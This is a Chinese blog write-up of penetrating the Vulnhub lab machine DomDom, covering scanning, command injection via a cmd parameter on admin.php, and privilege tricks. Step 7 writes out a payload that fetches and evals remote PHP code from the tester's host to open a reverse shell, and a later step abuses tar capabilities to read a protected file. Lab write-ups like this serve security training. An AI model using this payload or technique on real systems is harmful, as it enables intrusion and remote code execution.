靶机渗透日记 domdom

已于 2022-03-02 15:06:56 修改
阅读量296 收藏
点赞数
文章标签: 安全 web安全 渗透测试
于 2022-02-08 16:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47709391/article/details/122815328
版权

  1. ip

    在这里插入图片描述

  2. 端口

    在这里插入图片描述

  3. 访问80端口

    在这里插入图片描述

  4. 目录扫描

    在这里插入图片描述

  5. 访问 /admin.php

    在这里插入图片描述

  6. 使用 burp 抓包
    在这里插入图片描述

    将 index.php 修改成 admin.php

    在这里插入图片描述

    添加 cmd 参数,结果返回响应的信息

    在这里插入图片描述

  7. 反弹shell

    name=123&username=123&password=123&access=access&cmd=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.154.128:8080/6a3fvwaVo', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"

    在这里插入图片描述

  8. 在 /home/domom/Desktop 目录下存在 README.md ,但是没有权限
    在这里插入图片描述

  9. 搜索 capabilities

    getcap -r / 2>/dev/null

    在这里插入图片描述

    使用 tar 将 README.md 打包并读取

    tar -cvf readme.tar /home/domom/Desktop/README.md
cat readme.tar

    在这里插入图片描述

    直接切换到 root 用户

    在这里插入图片描述

# .
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机测试DomDom笔记
qq_56426046的博客
01-11 419
解决shell乱码问题,这个问题试了好久,kali上的默认shell是zsh。最后fg调出后来任务,回车得到无乱码的交互式shell。然后Ctrl+Z,把shell放到后台,在执行。本机开启个web服务,让靶机下载提权检测脚本。古有一言腰相印,谁教他、满箧婴鳞疏。登录抓包重放,发现命令执行漏洞。所以,我们先切换shell。打包用户 domom 目录。再然后获得交互shell。下载提权脚本,编译执行。
Vulnhub靶机DOMDOM_ 1
LainWith的博客
02-04 1084
目录介绍信息收集主机发现主机信息探测测试网站命令执行-反弹shell脏牛提权方式1方式2其他提权方式参考 介绍 系列:DomDom(此系列仅此一台) 发布日期:2019年7月11日 难度:初级 Flag : 未知 学习: 靶机地址:https://www.vulnhub.com/entry/domdom-1,328/ 信息收集 主机发现 nmap -sn 192.168.40.0/24 主机信息探测 信息探测:nmap -A -p- 192.168.40.152,只开放了80等端口。 测试网站 打开网
Vulbhub-DomDom
wwxxss
02-27 155
我们使用php代码进行建立反弹shell,因为是post传参所以对其进行url编码。我们把/index.php/index.php 改为 /admin.php。这里可以使用脏牛提权,但是我这里用新的一种查看root目录的方式,根据网站提示这是一个登录用户的界面,我们接着扫描一下网站的目录。因为靶机就开了一个80端口,因此我们只能从这三个文件中找漏洞。我们可以看见/bin/tar这说明可以对文件进行读写。开放了80端口web服务,我们访问靶机的网站。在一顿瞎试的情况下,找到了一个命令执行漏洞。
DVWA靶场-XSS(DOM型、反射型、存储型)
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-09 1804
DOM XSS DOM型XSS LOW DOM XSS 核心代码: Medium DOM XSS 核心代码: 绕过方法: High DOM XSS 核心代码: 绕过方式 Impossible DOM XSS 核心代码: Reflected XSS 反射型XSS Low Reflected XSS 核心代码 Medium Reflected XSS 核心代码 绕过方法 High Reflected XSS 核心代码 Impossible Reflected XSS 核
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Animetronic - hackmyvm
tanbinn的博客
08-12 469
hackmyvm的Animetronic靶场
H5直播行业的安全挑战:为何害怕黑客攻击?
@云安全小杜
08-13 429
随着移动互联网的快速发展,H5直播因其便捷性和互动性成为众多平台的选择。然而,这种开放性和交互性也带来了安全风险,使得H5直播行业成为了黑客攻击的目标之一。本文将探讨H5直播面临的常见威胁,并提供一些基本的防御措施。
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 316
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
IDS 与 IPS:网络安全的两道防线
hakksjss的博客
08-16 147
然而,IDS 也存在一定的局限性。它就像是网络世界中的“哨兵”,时刻保持警惕,依据一定的安全策略,分析网络数据包、系统日志等信息,试图发现各种潜在的攻击企图、入侵行为以及异常活动。此外,IPS 的误报率也是一个需要关注的问题,如果错误地拦截了正常的流量,可能会影响业务的正常运行。如果确定为攻击行为,IPS 则根据预先设置的规则和策略,立即阻断相关的流量,防止攻击对网络造成更大的破坏。它串联在网络中,实时分析流经的网络流量,一旦发现与已知攻击模式或异常行为相符的流量,立即采取行动,防止攻击的进一步扩散。
如何选择较为安全的第三方依赖版本?
最新发布
极客星云-CSDN博客
08-16 43
本篇博文分享如何选择较为安全的第三方依赖版本的方法。
企业如何组建安全稳定的跨国通信网络
TIANGEKUAJING的博客
08-13 241
当企业在海外设有分公司时,如何建立一个安全且稳定的跨国通信网络是一个关键问题。为了确保跨国通信的安全和稳定性,可以考虑以下几种方案。
Scout Suite:开源云安全审计工具
网络研究观
08-12 336
Scout Suite 是一个开源、多云安全审计工具,旨在评估云环境的安全态势。
安全自动化和编排:如何使用自动化工具和编排技术来提高安全操作效率。(第二篇)
艰难的活着
08-13 982
深入理解Kubernetes环境中的安全自动化与编排(第二篇)
Linux安全与高级应用(十二)深入探讨Linux系统中的YUM仓库服务与PXE网络装机
洛秋的博客
08-12 1151
YUM(Yellowdog Updater Modified)是基于RPM包管理的一种软件更新机制,它能够自动解决软件包之间的依赖关系,并且所有的软件包都来自集中的YUM仓库。YUM仓库是一种存储RPM包的集合,可以通过多种方式(如FTP、HTTP或本地目录)提供给客户机,客户机可以通过配置YUM仓库位置来获取和安装所需的软件包。YUM仓库服务与PXE网络装机是Linux系统管理中的两个关键技术,通过它们,管理员可以高效地管理软件包和进行大规模的系统部署。这不仅提高了工作效率,也增强了系统的稳定性和安全性。
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值